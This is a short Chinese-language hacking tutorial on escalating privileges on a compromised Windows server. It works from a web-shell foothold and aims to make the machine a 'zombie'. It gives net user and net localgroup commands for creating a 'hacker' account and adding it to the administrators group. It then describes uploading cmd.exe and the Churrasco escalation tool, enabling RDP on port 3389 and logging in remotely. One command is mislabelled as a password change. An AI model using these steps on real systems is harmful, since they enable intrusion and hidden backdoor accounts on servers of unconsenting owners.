提到system权限 甚至让他变成你的肉鸡
我们了解一下windows下面有那些用户
Guests是用户最低的权限 而且一般是被禁用的
User权限也很低
连关机都不行
还有window系统内置用户组
只对本站的主目录有读写修改的权限
Net user 显示你当前系统有那些用户账号
Net user administrator是显示当前用户的详细信息
Net user guest 从来没有登录 过 未启用 属于guests组的成员
添加用户
Net user hacker 123 /add
Net user 123456 /add (更改hacker的密码为123456)
Net user hacker /del 将hacker用户删除
启用账号 或者禁用账号
Net user guest /active:yes (启用账号)
禁用的话将active:no
Net localgroup 显示当前系统里面所有的组
Net localgroup administrator 后面加的是一个组的名称 查看administrator组有哪些成员
Net localgroup administrator hacker /add
将hacker添加到管理员组
Net localgroup administrator hacker /del
将hacker从管理员组中删除
提权实战
1 whoami 查看我是谁
这里看到是管理员
但是在菜刀连接的里面
拒绝访问
此时我们怎么办呐
方法一
上传一个cmd.exe
这是自己的cmd
此时我们再次尝试添加用户
很遗憾失败了
这时我们要用到提权软件了
上传提权软件
切换到软件路径
然后利用工具的语法
进行提权
Churrasco “命令”
接下来我们看他3389端口开放没有
Netstat –an 查看端口开放情况
如果没开怎么办
同样利用工具
两个工具同时使用
3389.bat 3389.vs
端口都开启了
Mstsc 远程桌面
连接成功
